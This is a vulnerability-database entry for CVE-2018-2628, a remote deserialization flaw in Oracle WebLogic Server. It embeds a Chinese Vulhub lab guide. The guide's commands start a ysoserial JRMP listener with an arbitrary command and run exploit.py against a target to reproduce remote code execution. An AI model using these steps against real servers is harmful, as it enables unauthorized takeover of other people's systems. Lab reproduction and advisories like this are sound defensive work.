CVE-2018-2628

9.8
9.8 / 10
CRITICAL

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Weakness: Deserialization of Untrusted Data

The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.

Published: 2018-04-19

Community Advisory

This section is open source, for any additional information that enhances or clarifies the official advisory above.

Improve Advisory

CVE-2018-2628 Exploits (26)

Show all exploits (+16):

CVE-2018-2628 Vulnerable Docker Environment

Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.

Get Vulhub Docker

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

参考链接:

  • http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
  • http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
  • https://github.com/tdy218/ysoserial-cve-2018-2628

漏洞环境

执行如下命令启动Weblogic 10.3.6.0:

docker-compose up -d

等待环境启动(环境差异,有的机器可能等待的时间比较久),访问http://your-ip:7001/console,初始化整个环境。

漏洞复现

首先下载ysoserial,并启动一个JRMP Server:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

其中,[command]即为我想执行的命令,而[listen port]是JRMP Server监听的端口。

然后,使用exploit.py脚本,向目标Weblogic(http://your-ip:7001)发送数据包:

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

其中,[victim ip][victim port]是目标weblogic的IP和端口,[path to ysoserial]是本地ysoserial的路径,[JRMPListener ip][JRMPListener port]第一步中启动JRMP Server的IP地址和端口。[JRMPClient]是执行JRMPClient的类,可选的值是JRMPClientJRMPClient2

exploit.py执行完成后,执行docker-compose exec weblogic bash进入容器中,可见/tmp/success已成功创建。

Official CVE References

View references (7)